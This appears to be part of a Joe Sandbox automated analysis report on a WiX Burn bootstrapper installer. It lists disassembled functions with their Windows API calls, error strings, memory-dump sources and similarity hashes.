SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B5C3
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B5C9

Strings

PE Header from file didn't match PE Header in memory., xrefs: 0009BA0D
Failed to read section info, unsupported version: %08x, xrefs: 0009B8F1
Failed to allocate memory for container sizes., xrefs: 0009B9CF
\CH, xrefs: 0009B3A0, 0009B494, 0009B4E7, 0009B3AD, 0009B497
Failed to seek to section info., xrefs: 0009B5F4, 0009B830
Failed to open handle to engine process path., xrefs: 0009B42A
Failed to find Burn section., xrefs: 0009BA2E
Failed to read section info, data to short: %u, xrefs: 0009B7A6
Failed to read signature size., xrefs: 0009B692
Failed to read complete image section header, index: %u, xrefs: 0009BA71
Failed to read section info., xrefs: 0009B895
4, xrefs: 0009B780
(, xrefs: 0009B719
Failed to seek past optional headers., xrefs: 0009B6E7
Failed to find valid NT image header in buffer., xrefs: 0009BACC
Failed to find valid DOS image header in buffer., xrefs: 0009BAE7
.wix, xrefs: 0009B72C
Failed to get total size of bundle., xrefs: 0009B91F
section.cpp, xrefs: 0009B420, 0009B473, 0009B4C1, 0009B524, 0009B573, 0009B5EA, 0009B639, 0009B688, 0009B6DD, 0009B794, 0009B7D4, 0009B826, 0009B88B, 0009B8B5, 0009B8DC, 0009B9C3, 0009BA03, 0009BA22, 0009BA5F, 0009BA9D, 0009BAC0, 0009BADB
Failed to seek to NT header., xrefs: 0009B52E
Failed to read signature offset., xrefs: 0009B643
Failed to allocate buffer for section info., xrefs: 0009B7E0
burn, xrefs: 0009B734
Failed to read image section header, index: %u, xrefs: 0009BAA8
Failed to read complete section info., xrefs: 0009B8C1
PE, xrefs: 0009B594
Failed to read DOS header., xrefs: 0009B4CB
Failed to read NT header., xrefs: 0009B57D
Failed to seek to start of file., xrefs: 0009B47D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$Pointer$Read
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$\CH$burn$section.cpp
API String ID: 2600052162-848869401
Opcode ID: 67760ad8dc4e9205606c6c274a62880a313ba47440e8079cbf8a75f5dde4a224
Instruction ID: 905f1b4d7de62d0942ff6a9ee680b8eb82dd140ff0e160ca9d60a862d63f845d
Opcode Fuzzy Hash: 67760ad8dc4e9205606c6c274a62880a313ba47440e8079cbf8a75f5dde4a224
Instruction Fuzzy Hash: C112A271A40325ABEF30AA65DD45FAB76E9EF04710F014166FE09EB281DB748D40EBB1

Function 000B0A77 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 288
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,000B0621,?,?), ref: 000B0A85
GetLastError.KERNEL32(?,?,?,00000000,00000000,?,000B0621,?,?), ref: 000B0A92
WaitForSingleObject.KERNEL32(?,?,?,?,?,00000000,00000000,?,000B0621,?,?), ref: 000B0ACE
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,000B0621,?,?), ref: 000B0AD8

Strings

Failed to reset begin operation event., xrefs: 000B0B4B
Failed to copy stream name: %ls, xrefs: 000B0BB7
Failed to set file pointer to beginning of file., xrefs: 000B0E20
cabextract.cpp, xrefs: 000B0AB6, 000B0AFC, 000B0B41, 000B0B6D, 000B0CBE, 000B0D2B, 000B0D7D, 000B0DC2, 000B0E16
Failed to wait for begin operation event., xrefs: 000B0B06
Failed to set end of file., xrefs: 000B0DCC
Failed to create file: %ls, xrefs: 000B0D38
Failed to allocate buffer for stream., xrefs: 000B0CC8
Invalid operation for this state., xrefs: 000B0B79
Failed to set operation complete event., xrefs: 000B0AC0
Failed to set file pointer to end of file., xrefs: 000B0D87

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$EventObjectSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3600396749-2104912459
Opcode ID: cbece43df3076afa560a78a2959e28ddc3e4d4f943fedb1b4f477bd1c29531a5
Instruction ID: e260e06ad77a592a9877557d10f169ec90e42d3e44fe8bd6d96bbc7a4b65a487
Opcode Fuzzy Hash: cbece43df3076afa560a78a2959e28ddc3e4d4f943fedb1b4f477bd1c29531a5
Instruction Fuzzy Hash: B8911272B80721FFF7205A7A8D49BAB7AD4EF08750F024226BE15FA5E0D765DC0086E1

Function 00094C33 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000933D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000910DD,?,00000000), ref: 000933F8

CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00094E3A
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00094E49
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00094E58
CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00094E63

Strings

%ls %ls, xrefs: 00094D4F
Failed to cache to clean room., xrefs: 00094CBC
Failed to launch clean room process: %ls, xrefs: 00094DF1
Failed to append %ls, xrefs: 00094D16
D, xrefs: 00094DA3
"%ls" %ls, xrefs: 00094D74
engine.cpp, xrefs: 00094DE4
-%ls="%ls", xrefs: 00094CE0
Failed to allocate full command-line., xrefs: 00094D88
burn.filehandle.self, xrefs: 00094D3F
Failed to wait for clean room process: %ls, xrefs: 00094E1D
burn.filehandle.attached, xrefs: 00094D11
burn.clean.room, xrefs: 00094CD8
Failed to allocate parameters for unelevated process., xrefs: 00094CF4
Failed to append original command line., xrefs: 00094D63
Failed to get path for current process., xrefs: 00094C7D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3884789274-2391192076
Opcode ID: 12d793b230a71577e1f13230b92166cb165070008cf90d3f47bed9775c87c688
Instruction ID: 948ff4f8e0a6068d01b680517d4000bdcc74da5975685e4b7f6422390a1abf26
Opcode Fuzzy Hash: 12d793b230a71577e1f13230b92166cb165070008cf90d3f47bed9775c87c688
Instruction Fuzzy Hash: 55718671D01329FBDF219BA4CC41EEFBBB8AF04720F114126FA14B7291DB745A429BA1

Function 000A7337 Relevance: 35.3, APIs: 1, Strings: 19, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WixBundleOriginalSource, xrefs: 000A7547
Failed to set source process folder variable., xrefs: 000A7533
Failed to load manifest., xrefs: 000A73F5
Failed to get manifest stream from container., xrefs: 000A73D9
WixBundleSourceProcessFolder, xrefs: 000A7522
Failed to initialize variables., xrefs: 000A737E
Failed to open manifest stream., xrefs: 000A73B8
Failed to set original source variable., xrefs: 000A7558
Failed to initialize internal cache functionality., xrefs: 000A758D
Failed to get unique temporary folder for bootstrapper application., xrefs: 000A75BC
Failed to get source process folder from path., xrefs: 000A7513
Failed to extract bootstrapper application payloads., xrefs: 000A75DD
Failed to set source process path variable., xrefs: 000A74F7
Failed to open attached UX container., xrefs: 000A739B
Failed to parse command line., xrefs: 000A7474
WixBundleElevated, xrefs: 000A74B3, 000A74C4
Failed to overwrite the %ls built-in variable., xrefs: 000A74C9
Failed to load catalog files., xrefs: 000A75FD
WixBundleSourceProcessPath, xrefs: 000A74E6

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
API String ID: 32694325-252221001
Opcode ID: d7eab31e7eeab67f4f140bd33bb4dd491daa5335adfcc7503a19c6e8ed1393b3
Instruction ID: 8ebb8d7e66dd07bafb671d1294ab0ecc504671ef6ec05f00a4752a9324f09352
Opcode Fuzzy Hash: d7eab31e7eeab67f4f140bd33bb4dd491daa5335adfcc7503a19c6e8ed1393b3
Instruction Fuzzy Hash: 76919572E44A19BFCB229AE4CC41FEEB7ACBF05700F018226F609F7141D7719A449BA4

Function 000A84C4 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 205
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00094CB6,?,?,00000000,00094CB6,00000000), ref: 000A8507
GetLastError.KERNEL32 ref: 000A8514
CloseHandle.KERNELBASE(00000000,?,00000000,000DB4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000A86F6

Strings

Failed to seek to signature table in exe header., xrefs: 000A8660
Failed to zero out original data offset., xrefs: 000A86E8
Failed to copy engine from: %ls to: %ls, xrefs: 000A859C
Failed to seek to checksum in exe header., xrefs: 000A85F9
Failed to seek to original data in exe burn section header., xrefs: 000A86CF
cabinet.dll, xrefs: 000A866F
cache.cpp, xrefs: 000A8538, 000A85EF, 000A8656, 000A86C5
msi.dll, xrefs: 000A8608
Failed to seek to beginning of engine file: %ls, xrefs: 000A856D
Failed to update signature offset., xrefs: 000A8615
Failed to create engine file at path: %ls, xrefs: 000A8545

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 2528220319-1976062716
Opcode ID: 6cd1e3b4b1d55718d825b6c7079ccff79ba48a7fea63bbfcf1f768fb6fe5700e
Instruction ID: d5315b99a7588607ed6c986a0c98e27a0279b3cdb67d6ecaad9db52fe76c4b5a
Opcode Fuzzy Hash: 6cd1e3b4b1d55718d825b6c7079ccff79ba48a7fea63bbfcf1f768fb6fe5700e
Instruction Fuzzy Hash: 0351E672A41721BFFB115AA99C4AFBB7698EF05750F014126FE05FB281EB648C0097F5

Function 00097503 Relevance: 33.4, APIs: 1, Strings: 21, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(000A7378,000952B5,00000000,0009533D), ref: 00097523

Strings

0, xrefs: 0009753D
InstallerVersion, xrefs: 0009771E
WixBundleSourceProcessFolder, xrefs: 00097D86
WixBundleTag, xrefs: 00097D99
', xrefs: 000977E2
WixBundleAction, xrefs: 00097C90
WixBundleActiveParent, xrefs: 00097D47
WixBundleForcedRestartPackage, xrefs: 00097CF0
WixBundleExecutePackageCacheFolder, xrefs: 00097CAC
WixBundleExecutePackageAction, xrefs: 00097CCE
InstallerName, xrefs: 000976F8
WixBundleInstalled, xrefs: 00097D12
$, xrefs: 00097C54
Date, xrefs: 00097642
#, xrefs: 0009759C
WixBundleVersion, xrefs: 00097DAC
LogonUser, xrefs: 000977B2
WixBundleProviderKey, xrefs: 00097D5A
WixBundleElevated, xrefs: 00097D2E
Failed to add built-in variable: %ls., xrefs: 00097DF0
WixBundleSourceProcessPath, xrefs: 00097D6D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion
API String ID: 32694325-826827252
Opcode ID: 271409593653e2e651b074dbd2bd7fed9cbc0a14f2db5b413c884d9eb9a70364
Instruction ID: 34e1d25ba5166d330d742a35805512940b61c20da245830f2fae98fed1c42f38
Opcode Fuzzy Hash: 271409593653e2e651b074dbd2bd7fed9cbc0a14f2db5b413c884d9eb9a70364
Instruction Fuzzy Hash: FF3226B0C263798BDB65CF59C98878DBAB8BB49B04F5081DBE10CA6311D7B50B84DF94

Function 000A80AE Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00095381), ref: 000A8104

Part of subcall function 000D076C: OpenProcessToken.ADVAPI32(?,00000008,?,000952B5,00000000,?,?,?,?,?,?,?,000A74AB,00000000), ref: 000D078A
Part of subcall function 000D076C: GetLastError.KERNEL32(?,?,?,?,?,?,?,000A74AB,00000000), ref: 000D0794
Part of subcall function 000D076C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,000A74AB,00000000), ref: 000D081D

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 000A812A
GetLastError.KERNEL32 ref: 000A8134
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 000A81B1
GetLastError.KERNEL32 ref: 000A81BB

Strings

Failed to create working folder guid., xrefs: 000A8207
Failed to convert working folder guid into string., xrefs: 000A823A
Failed to get windows path for working folder., xrefs: 000A8162
%ls%ls\, xrefs: 000A824C
cache.cpp, xrefs: 000A8158, 000A81DF, 000A8230
Failed to ensure windows path for working folder ended in backslash., xrefs: 000A817F
Failed to get temp path for working folder., xrefs: 000A81E9
Failed to copy working folder path., xrefs: 000A827F
Temp\, xrefs: 000A8189
Failed to concat Temp directory on windows path for working folder., xrefs: 000A81A1
Failed to append bundle id on to temp path for working folder., xrefs: 000A8264

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$Process$CloseCurrentDirectoryHandleOpenPathTempTokenWindows
String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 348923985-819636856
Opcode ID: 37fdaffe0722d086016e8e18659cb1dab4aa638753f3eef184809deb007c1ca6
Instruction ID: b952d17442ed540e6870f9ff057dd34ad9e2e42bad676ecfb25b247f6ba18e93
Opcode Fuzzy Hash: 37fdaffe0722d086016e8e18659cb1dab4aa638753f3eef184809deb007c1ca6
Instruction Fuzzy Hash: 25410872F45724ABEB60A6F59C49FBB73ACAB05750F004162FE05FB140EA759D048BA1

Function 000B0E43 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 000B0E65
CoUninitialize.COMBASE ref: 000B10D9

Strings

<the>.cab, xrefs: 000B0F05
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 000B0FC0
Failed to reset begin operation event., xrefs: 000B1091
Failed to initialize COM., xrefs: 000B0E71
cabextract.cpp, xrefs: 000B0EDB, 000B0FFF, 000B104A, 000B1087, 000B10B3
Failed to wait for begin operation event., xrefs: 000B1054
Failed to initialize cabinet.dll., xrefs: 000B0EE7
Invalid operation for this state., xrefs: 000B10BD
Failed to set operation complete event., xrefs: 000B1009

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: a159e96c7cce8b2ad130255f405842416d3cadcc6ebc7d8968db9e3c5335b38f
Instruction ID: e7d0e97de098dafbb3dd738d0e2b5a34b7242233e1d49e8d4587112a212eb1d2
Opcode Fuzzy Hash: a159e96c7cce8b2ad130255f405842416d3cadcc6ebc7d8968db9e3c5335b38f
Instruction Fuzzy Hash: 2351B032B54362EBD7302665CD45EFFB690DB45760F12023AFD02BF780D6A98D009AE2

Function 000941D2 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,0009515E,?,?,00000000,?,?), ref: 000941FE
InitializeCriticalSection.KERNEL32(000000D0,?,?,0009515E,?,?,00000000,?,?), ref: 00094207
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,0009515E,?,?,00000000,?,?), ref: 0009424D
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,0009515E,?,?,00000000,?,?), ref: 00094257
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0009515E,?,?,00000000,?,?), ref: 0009426B
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,0009515E,?,?,00000000,?,?), ref: 0009427B
lstrlenW.KERNEL32(burn.filehandle.self,?,?,0009515E,?,?,00000000,?,?), ref: 000942CB
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,0009515E,?,?,00000000,?,?), ref: 000942D5
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0009515E,?,?,00000000,?,?), ref: 000942E9
lstrlenW.KERNEL32(burn.filehandle.self,?,?,0009515E,?,?,00000000,?,?), ref: 000942F9

Strings

burn.filehandle.attached, xrefs: 00094248, 00094250, 00094255, 00094256, 00094276, 0009439A
Failed to parse file handle: '%ls', xrefs: 0009437D
engine.cpp, xrefs: 00094390, 000943BC
Missing required parameter for switch: %ls, xrefs: 0009439F
burn.filehandle.self, xrefs: 000942C6, 000942CE, 000942D3, 000942D4, 000942F4, 000943C6
Failed to initialize engine section., xrefs: 00094362

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: 497bfd50ce057908e14e7f048ded146c63f33ab1001fe1dc64842e4a778f758a
Instruction ID: 5692e4bced61b3cc29fad07ad44924e82c59c7fbd0da3c440a4f379c87b6a493
Opcode Fuzzy Hash: 497bfd50ce057908e14e7f048ded146c63f33ab1001fe1dc64842e4a778f758a
Instruction Fuzzy Hash: 9A51C471A40315FFDB249B69DC86FAAB7A8EF04720F014116F618DB290DB70AA51DBB4

Function 0009C129 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 128
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0009C319,000952FD,?,?,0009533D), ref: 0009C170
GetLastError.KERNEL32(?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?,00000000), ref: 0009C181
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?), ref: 0009C1D0
GetCurrentProcess.KERNEL32(000000FF,00000000,?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?,00000000), ref: 0009C1D6
DuplicateHandle.KERNELBASE(00000000,?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?,00000000), ref: 0009C1D9
GetLastError.KERNEL32(?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?,00000000), ref: 0009C1E3
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?,00000000), ref: 0009C235
GetLastError.KERNEL32(?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?,00000000), ref: 0009C23F

Strings

Failed to move file pointer to container offset., xrefs: 0009C26D
feclient.dll, xrefs: 0009C232
crypt32.dll, xrefs: 0009C231
Failed to open container., xrefs: 0009C28B
Failed to open file: %ls, xrefs: 0009C1B2
Failed to duplicate handle to container: %ls, xrefs: 0009C214
container.cpp, xrefs: 0009C1A5, 0009C207, 0009C263

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 64f9e8e6dfd91cf78bdc99738771a7f4f43dced8a7af53419f540d31ca838d9d
Instruction ID: 476d2fccedf2372c28151b43abb881a7e158fad58e91d6f9e03615a7cb2e0f08
Opcode Fuzzy Hash: 64f9e8e6dfd91cf78bdc99738771a7f4f43dced8a7af53419f540d31ca838d9d
Instruction Fuzzy Hash: 6B41B036640301ABEB209F6A9C45F673BE9AF85750F11812AFD19DB291DA31C801EB70

Function 000D29B3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000937EA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00093829
Part of subcall function 000937EA: GetLastError.KERNEL32 ref: 00093833

Part of subcall function 000D4932: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000D495A

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 000D29FD
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 000D2A20
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 000D2A43
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 000D2A66
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 000D2A89
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 000D2AAC
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 000D2ACF

Strings

MsiSetExternalUIRecord, xrefs: 000D2A93
MsiSourceListAddSourceExW, xrefs: 000D2AB6
MsiEnumProductsExW, xrefs: 000D2A2A
MsiGetPatchInfoExW, xrefs: 000D2A4D
MsiDeterminePatchSequenceW, xrefs: 000D29F2
MsiGetProductInfoExW, xrefs: 000D2A70
